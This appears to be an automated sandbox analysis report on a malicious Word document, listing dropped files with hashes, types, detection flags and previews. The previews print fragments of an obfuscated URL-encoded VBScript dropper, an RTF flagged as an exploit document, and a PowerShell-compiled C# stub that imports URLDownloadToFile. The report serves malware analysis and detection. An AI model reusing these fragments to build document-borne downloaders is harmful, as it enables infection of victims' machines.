                                                                                                                                                                        Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscrIpT%252520laNGuAge%25253D%252522VbscRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):957
                                                                                                                                                                        Entropy (8bit):5.008511330476407
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:tksnd61GkMyGWKyGXPVGArwY3OHfv+oQasHuGHmArpv/mOAaNO+ao9W7iN5zzkwQ:qUdluKyGX85jHf3SvXhNlT3/7YvfbYro
                                                                                                                                                                        MD5:F2892DD2C0877EA2A51B1A178A1655FC
                                                                                                                                                                        SHA1:3AD11A0C61DFCD7AC260659F0F42BF99E0D1DD06
                                                                                                                                                                        SHA-256:A8BD5E77C30BECDD2CF64792CA633F4255BC8AFB54270F760BEA2E58E1432091
                                                                                                                                                                        SHA-512:7E6519B0F9F221B257B2113363BA4BB3E8E55FD63FC129E2761F5587F02A773064E31559AE16B6AC9267BA40A25CF8DC03BE57217AA800047E6BCCD2FDE9AF93
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{. "geoplugin_request":"173.254.250.90",. "geoplugin_status":200,. "geoplugin_delay":"3ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1505804
                                                                                                                                                                        Entropy (8bit):1.5373625757766853
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:0LibOpAijJ7eb6Z777pRt/n/DCrhCO77pZBfB8n2/GlgdzfUsM:nbu+uZt/n/mMmBG2cZsM
                                                                                                                                                                        MD5:5B10EB871FC363103C5E47EF06279006
                                                                                                                                                                        SHA1:54BF2A907C6AD22B9C0C4A1A90E4DBD6AC1132F8
                                                                                                                                                                        SHA-256:6B8BF5308896F989C556A5C64E8E7473B668FFDC7230422B8656BAC3A3C6B52D
                                                                                                                                                                        SHA-512:3FD1538F75D14470757836BF41577E2BEBD284F8D525D76050750BC58137B38B4515D1DAE649089DF7B0E873CD4BE982287D1D53B30FC1C9D8707C1166295C3C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Rich Text Format data, version 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):87950
                                                                                                                                                                        Entropy (8bit):2.6460884092834385
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:OjO/O2+S+PXH9C+QwmXiTfgiK2l2xIPaa:gR2Dl+QtwDlca
                                                                                                                                                                        MD5:BFC7589C5992988E346361BA16E0F921
                                                                                                                                                                        SHA1:A546AAECD617E235E40362B626A2586636C39D65
                                                                                                                                                                        SHA-256:A4030FDB30504AAA2077873AAD15595B4D87BBFABAEB8AE1B245D6613941A591
                                                                                                                                                                        SHA-512:298C036894BB4FF1971DD2D9EA554872830B53D65DE0CC70770580E9276F6F1251F6A075407585268F6E292D15FDB3AB27E66CD3554E501D7A68D02E37842232
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.doc, Author: ditekSHen
                                                                                                                                                                        Preview:{\rtf1..{\*\u4CejNJYaQZlC85Z28jrieibfWIYwYrBS76sJxdQSFfic06eKWkOTLommHk4ogDr58LKQBGddTreO}..{\5265154797?./.86&63.1~=3??1##&+?.@5:~_.#,3.;[9$69,?9%'#?/%.1?3<?!7!?:9-3*622~5=''8?4]8?=)4;.8?>>?'6<;=$-|%(9@^5*,=(?%1&_``;/?.=.1|`3.]~?6#(*&?##?+_,||>@6.)7[@?3/[9.|?@(?#]^(!%3&)&%73%6`%.$^[?&?;?.*^<1[8][0[?$.|0?/4.8%3.~'./36??(8`*?.6?<@@2/-/=.%|5*|%;,]:19!$.%)(_=^()<>0,3=@!]@=?'!$-&(,-%3@,_0|>~].4;@,6!*5=|~2'%<?,^%)8-7%^0$.?&)?;0.^?-&?$+<1#//+-?,6*[(16<..`613)%>?@%?|2`6;<%&/2_#=>=@2.-8~.?+4;.-%#6%^9,^~_!?1803%'4#(.%2?!%%/*6'!]`((1;+?..``?._))0?,<53=@@9..9?-^,|&@~:^.@'|^&%|'%?`.`.-^.&?6/+)</6,]/?,.#!:8.!|?@0(;?/(4%,_2-2`9?`%-@!1%%5?>_.`!'&3;..:2-$&,.'0.@5:%=%_/2/?8?/][9:5=>.)3*~`6%3?-.|`/?#.-^~^?&?;)?<0]]/8,|?*.%;)<'!54?~<43.4[=~,&5`]%`#];)82-?!,]_@%?~9(2??-])6)./7+?5-`.!:~'(@-~.&:>*^1?/0@+.^5'?<93[.,'(7<7<&:&&%?5>'$.'>98'$'.3'/>:&80~`%..@'?+^^/40<#@+;2%&1?4?-&/5/*^??*?^?+](^??[#.2!?&)[+$??*0%>13?~_2`(:7~==*?,1]>5.5<3:<?./6`#<[**@>(`5<1~?#*6/#?_%.?:@%,?9?*~.0|[.%7$+32%>[~.,82))[%6/>95--$.+;<??
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1505804
                                                                                                                                                                        Entropy (8bit):0.7675459840560199
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:JHUeftXoA9wy4X4da3H0UpyKkqxJ6jT1Fk:JHftXR9wyc4da3H0UpyNqCjT1Fk
                                                                                                                                                                        MD5:F24D633207ADC1D6552DC4F828B8C24B
                                                                                                                                                                        SHA1:C69130CEFC20FC6FA19803CA47D57BD784F2870F
                                                                                                                                                                        SHA-256:7913E08C0F2237C6E9975EEBA4499AA5627107017134A60B4272D90822423F12
                                                                                                                                                                        SHA-512:E063BDA64808A2D8490C03E685E313F6A209D28E61057EC3C93E7301054D39B3377AACE04EA5E2524964D9B20464D0483774D44E9B52630B9FBB258111D32B70
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1504016
                                                                                                                                                                        Entropy (8bit):2.4398608801152193
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:FITPdQ/zh7PsKANiceWpWUgimSyvwpWiYiV1h5FildmAd7CUCKMi+c2q2coH4HAt:FIrimNiceWWUPByopWChylpdxoHJ2+
                                                                                                                                                                        MD5:AC10ADEB2A9D6FC6FF6A258E76747696
                                                                                                                                                                        SHA1:0FDD4E28A13F81DA9FFCFB571B134E1F45AD3A92
                                                                                                                                                                        SHA-256:3431033CA736890EE16648952CDDAFF6DDF70E17D59FCBFFDF69F492B7188375
                                                                                                                                                                        SHA-512:0534BE83D100FA6E41FD0D93B35AD4F304DBC59A5ED33D6C2A1816603536C86759F5B8BB92958EB5E21490AF558214CA21F951A1E103EE3000A0933C12435691
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:....l...........R...H............)...;.. EMF................................8...X....................?...........................................)...;..........S...I...Q...T...........R...H...................S...I...P...(...x........... ....)...;..(...S...I.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4816896
                                                                                                                                                                        Entropy (8bit):2.2747218255427213
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:Si4IrfNiczByopvhylpdOJC7R/gtGoXuDK6CI05YbuR011xDsi:9vZhylpdOO/gsol6C15Ybu8b
                                                                                                                                                                        MD5:85D84D56993BB236CE8D81AECC132E30
                                                                                                                                                                        SHA1:EA526BC8E6F6262EA0981CF7F9B47F82F7361CBA
                                                                                                                                                                        SHA-256:86BDB5453A497219DE10DC373C36ABB85724CC380607557B864682B6ED302687
                                                                                                                                                                        SHA-512:E1FCD1AABBC03DCF698A48C63D77B5DE22F5346A5DBCAD2E84F4446A35A67B07F89A4FFA12BDDC91399BBFC896689D4330BE11EE1BCC32EA9C93413FBFEA2B1C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Preview:......................>...................J...................................................................................................................................1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G.......................................................................................................M$..............................................................................................................................................................................0...............................................................................................!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1536
                                                                                                                                                                        Entropy (8bit):2.411772832245565
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:NXHH3qpWmyayKpWmyayKpWmyaWBz/Ips+yvoOAH1IWj1ABvZSA:9na3oK3oK3yE++THuWj1UF
                                                                                                                                                                        MD5:54ED5B3B148ED05A5A6C394E6D007E92
                                                                                                                                                                        SHA1:DA255B0440C9DB2412E7AB00E54185EEA0650D0B
                                                                                                                                                                        SHA-256:B3D90B13DED7D2011875C6A606387DEA09E17DB8230CC0EF174981658BB4D419
                                                                                                                                                                        SHA-512:CA8A3DBA48F34A614828BD67B59A92D3067FBC13D9AB451DCD19A5F30D35F71F40CE8AF08EAE9574E3BB7C267616883958B41A60D49C166B1B344658C440B9FB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.................................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.........................E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....................................................................................................................................................................................................................................X...Z...\...^...b...f...j....................................................................................................................................................................................................................................................................................................................................................................................................d........gd........
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:StarOffice Gallery theme j, 1828744448 objects, 1st 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):13312
                                                                                                                                                                        Entropy (8bit):3.626950772374087
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:1BlezssHyH1YthSznJeizs0KlxZAHJ4aAgKLYzK55ou2FRFqqwZIdk9jOmkAb:7YHyHSL9xXQK5+FRFqqwZIOfnb
                                                                                                                                                                        MD5:A95212FE656331CA9A95B8CCEC1EADE6
                                                                                                                                                                        SHA1:C4AC88C2D8D8BA630D084A67D66DAED4E1CCA7EE
                                                                                                                                                                        SHA-256:0E6BB1425551ABC7BD034057612C79F1B2CF8A525E6EB0B87E0C253491A3A014
                                                                                                                                                                        SHA-512:A0978C88111FAC1FD0D6B7EC0B1A7D3FB9A21C84F45A1AE72B55CEAED9ADF47D39997A026042B11EEAF4235EF892B6817AC44E27F137E4085FA36BEC15B7B954
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..e.j.N.J.Y.a.Q.Z.l.C.8.5.Z.2.8.j.r.i.e.i.b.f.W.I.Y.w.Y.r.B.S.7.6.s.J.x.d.Q.S.F.f.i.c.0.6.e.K.W.k.O.T.L.o.m.m.H.k.4.o.g.D.r.5.8.L.K.Q.B.G.d.d.T.r.e.O.2.6.5.1.5.4.7.9.7.?.../...8.6.&.6.3...1.~.=.3.?.?.1.#.#.&.+.?...@.5.:.~._...#.,.3...;.[.9.$.6.9.,.?.9.%.'.#.?./.%...1.?.3.<.?.!.7.!.?.:.9.-.3.*.6.2.2.~.5.=.'.'.8.?.4.].8.?.=.).4.;...8.?.>.>.?.'.6.<.;.=.$.-.|.%.(.9.@.^.5.*.,.=.(.?.%.1.&._.`.`.;./.?...=...1.|.`.3...].~.?.6.#.(.*.&.?.#.#.?.+._.,.|.|.>.@.6...).7.[.@.?.3./.[.9...|.?.@.(.?.#.].^.(.!.%.3.&.).&.%.7.3.%.6.`.%...$.^.[.?.&.?.;.?...*.^.<.1.[.8.].[.0.[.?.$...|.0.?./.4...8.%.3...~.'.../.3.6.?.?.(.8.`.*.?...6.?.<.@.@.2./.-./.=...%.|.5.*.|.%.;.,.].:.1.9.!.$...%.).(._.=.^.(.).<.>.0.,.3.=.@.!.].@.=.?.'.!.$.-.&.(.,.-.%.3.@.,._.0.|.>.~.]...4.;.@.,.6.!.*.5.=.|.~.2.'.%.<.?.,.^.%.).8.-.7.%.^.0.$...?.&.).?.;.0...^.?.-.&.?.$.+.<.1.#././.+.-.?.,.6.*.[.(.1.6.<.....`.6.1.3.).%.>.?.@.%.?.|.2.`.6.;.<.%.&./.2._.#.=.>.=.@.2...-.8.~...?.+.4.;...-.%.#.6.%.^.9.,.^.~._.!.?.1.8.0.3.%.'.4.#.(...%.2.?.!.%.%./.
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1024
                                                                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Wed Oct 23 15:26:43 2024, 1st section name ".debug$S"
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1324
                                                                                                                                                                        Entropy (8bit):4.011201687151952
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:HRi69dUBcQhpDdHd6wKPfeI+ycuZhNmYakSZNPNnqSud:s2u9RKPm1ulmYa3ZXqSu
                                                                                                                                                                        MD5:B46C7C140CC97B9985363E258E608A6C
                                                                                                                                                                        SHA1:3C0BF962827CE222D5304C3A3099EA67B5A5B964
                                                                                                                                                                        SHA-256:D09FFF6C86421330786F4951B704E2C9135EFA8A084AF8F4B8F3CA674A29D0C5
                                                                                                                                                                        SHA-512:B90C80469F966080FB8FB4DC4470B77B6563C3C63DA7AFE6749FEF60B9898191EE21F7A1A8E6A043D83CBB0535E3232C6F35F3CBBA10747DA13FEDA814235A3F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:L......g.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........T....c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP...............aa.g)....`.^J.[..........4.......C:\Users\user\AppData\Local\Temp\RES8872.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.0.q.j.a.x.5.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3d910114, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):21037056
                                                                                                                                                                        Entropy (8bit):1.1388600355728242
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:iO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:iOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                        MD5:D36D5C3CFB8267727D7975343965203B
                                                                                                                                                                        SHA1:93F1F523986DAFDC0ADD395270DF7113D85F0682
                                                                                                                                                                        SHA-256:01A25C3697CC2E6A5535CAE1D2BBA6C6027BD527FBB12665CCF2052DA48A6DBF
                                                                                                                                                                        SHA-512:745257EBB4E81A93778B66E4D8BD88AE263AA570C7615258BC22CB735BEF846E6AECD53FF146BE230B7A2CCA7BE940A4329FFDF1706A1A082829AFFD0D964BE0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:=...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):652
                                                                                                                                                                        Entropy (8bit):3.106951660604609
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryy5Yak7YnqqH5NPN5Dlq5J:+RI+ycuZhNmYakSZNPNnqX
                                                                                                                                                                        MD5:6161C3966729D7F697DC60BA5E4A975B
                                                                                                                                                                        SHA1:E18FE4DA827B94CC94970FFFE507FC72E29FDE71
                                                                                                                                                                        SHA-256:639B8EED54BF6A9D2DFE9F48504FB497CB550BBB764335C2D54F0E7B06A5E39C
                                                                                                                                                                        SHA-512:ADAC6F2082F87D865E6FB0D554F2C8195F8BD8D68C6BF385B99ED1524558BEE52C9142BF881FAB65F5F682AF78454E759FCB03942F998C75D92EB0002EC569F0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.0.q.j.a.x.5.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.0.q.j.a.x.5.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (360)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):473
                                                                                                                                                                        Entropy (8bit):3.8268655042395507
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:V/DsYLDS81zudnUlNFdMGHJQXReKJ8SRHy4H5brbcVO7TJy:V/DTLDfulUGXfHSwy
                                                                                                                                                                        MD5:67AE4DF6A1C261AA858A750A83C8D280
                                                                                                                                                                        SHA1:638E31EC092818F9C185A373E406F5D22D14B776
                                                                                                                                                                        SHA-256:1B3518C97744E3F5DCB626A3F6255B2327D3142CA96470BA25150360779A1ECE
                                                                                                                                                                        SHA-512:FBF8827829A806FE8C3F3F1B642631DCD4C89BA029BDC272D8E2F8040934A7D704099EF235BFD870CA2984B3146E45B0836FD19068C37A30CC6F1A308F68CCA8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace GxeSMVBq.{. public class r. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr hckcPhb,string aWJLSiO,string SPiuVk,uint MvunjagDV,IntPtr aKxSkguH);.. }..}.
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):369
                                                                                                                                                                        Entropy (8bit):5.295065223597476
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fdElzxs7+AEszIP23fdEgn:p37Lvkmb6KzlIWZEolF
                                                                                                                                                                        MD5:0D9D24484E8C9B8B1AC03F37A6556912
                                                                                                                                                                        SHA1:F5F086902A7BE153A6A94A093D3F99C3D4111139
                                                                                                                                                                        SHA-256:64157CD1775F8BCA930DEE64893D63EAE7456A478F2DF1D4D6DBCFC51E329021
                                                                                                                                                                        SHA-512:4FC52811E6EBC0920269694412F2C9ACB10897F5592C1EC3255C32F959C6083C63262E16EC4BFEEACC8F8F7181B317C18FADF1E466DBE2705A3474F90293FB36
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.0.cs"
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
